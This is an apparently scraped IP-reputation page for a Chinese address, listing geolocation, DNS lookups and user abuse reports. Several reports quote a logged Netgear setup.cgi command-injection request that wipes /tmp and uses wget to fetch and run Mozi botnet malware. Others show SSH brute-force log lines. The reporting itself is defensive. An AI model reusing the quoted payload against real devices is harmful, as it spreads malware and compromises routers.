42.224.25.30 - IPInfo

基本信息:

城市(city): Laocheng

省份(region): Henan

国家(country): China

运营商(isp): China Unicom

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

IP	类型	评论内容	时间
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-02 01:42:57
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-01 17:49:36

类型

评论内容

时间

42.224.25.179

attack

42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...

2020-10-02 01:42:57

42.224.25.179

attack

42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...

2020-10-01 17:49:36

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.224.25.30
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7011
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;42.224.25.30.			IN	A

;; AUTHORITY SECTION:
.			196	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021102 1800 900 604800 86400

;; Query time: 64 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 12 11:54:53 CST 2022
;; MSG SIZE  rcvd: 105

HOST信息:

30.25.224.42.in-addr.arpa domain name pointer hn.kd.ny.adsl.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
30.25.224.42.in-addr.arpa	name = hn.kd.ny.adsl.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
176.215.246.202	attackspam	Honeypot attack, port: 81, PTR: dynamicip-176-215-246-202.pppoe.irkutsk.ertelecom.ru.	2020-02-08 19:14:04
78.239.4.173	attackbotsspam	Honeypot attack, port: 5555, PTR: str13-1-78-239-4-173.fbx.proxad.net.	2020-02-08 18:51:03
103.9.227.173	attackbotsspam	Honeypot attack, port: 445, PTR: sijoli-173-227-9.jatengprov.go.id.	2020-02-08 18:55:14
85.93.20.66	attack	20 attempts against mh-misbehave-ban on steel	2020-02-08 19:02:40
37.49.231.127	attack	Port 5038 scan denied	2020-02-08 18:42:34
123.0.198.61	attack	Telnet Server BruteForce Attack	2020-02-08 18:58:14
202.69.38.82	attackspam	Automatic report - XMLRPC Attack	2020-02-08 19:21:01
61.161.237.38	attackbots	Feb 8 05:51:51 ArkNodeAT sshd\[548\]: Invalid user eeo from 61.161.237.38 Feb 8 05:51:51 ArkNodeAT sshd\[548\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=61.161.237.38 Feb 8 05:51:53 ArkNodeAT sshd\[548\]: Failed password for invalid user eeo from 61.161.237.38 port 56642 ssh2	2020-02-08 18:48:23
95.211.201.194	attack	Port 389 scan denied	2020-02-08 19:05:50
114.32.120.19	attack	Honeypot attack, port: 81, PTR: 114-32-120-19.HINET-IP.hinet.net.	2020-02-08 18:51:58
179.215.157.76	attackspambots	Honeypot attack, port: 5555, PTR: b3d79d4c.virtua.com.br.	2020-02-08 19:09:24
106.51.1.191	attackbots	445/tcp [2020-02-08]1pkt	2020-02-08 18:47:56
49.255.179.216	attackspam	Feb 8 10:37:26 XXX sshd[40489]: Invalid user spa from 49.255.179.216 port 37380	2020-02-08 19:18:16
218.78.54.84	attackspambots	Feb 8 08:35:53 ns382633 sshd\[6171\]: Invalid user ppr from 218.78.54.84 port 52414 Feb 8 08:35:53 ns382633 sshd\[6171\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.78.54.84 Feb 8 08:35:55 ns382633 sshd\[6171\]: Failed password for invalid user ppr from 218.78.54.84 port 52414 ssh2 Feb 8 08:40:55 ns382633 sshd\[7119\]: Invalid user ppr from 218.78.54.84 port 53356 Feb 8 08:40:55 ns382633 sshd\[7119\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.78.54.84	2020-02-08 18:45:37
90.116.100.18	attackbots	Feb 7 21:49:18 hpm sshd\[18683\]: Failed password for invalid user fpy from 90.116.100.18 port 53134 ssh2 Feb 7 21:52:39 hpm sshd\[19051\]: Invalid user ofk from 90.116.100.18 Feb 7 21:52:39 hpm sshd\[19051\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=lfbn-nic-1-260-18.w90-116.abo.wanadoo.fr Feb 7 21:52:41 hpm sshd\[19051\]: Failed password for invalid user ofk from 90.116.100.18 port 54820 ssh2 Feb 7 21:56:03 hpm sshd\[19471\]: Invalid user ihq from 90.116.100.18	2020-02-08 18:39:47

最近上报的IP列表

2.101.143.15	42.224.66.219	42.225.210.211	42.226.85.181
42.226.73.36	42.226.82.138	42.227.224.146	42.228.102.73
42.227.210.66	42.228.44.96	42.226.113.67	42.227.208.244
42.228.99.220	42.228.41.46	42.228.216.118	42.229.217.52
42.229.128.40	42.229.254.81	42.229.253.215	42.230.112.252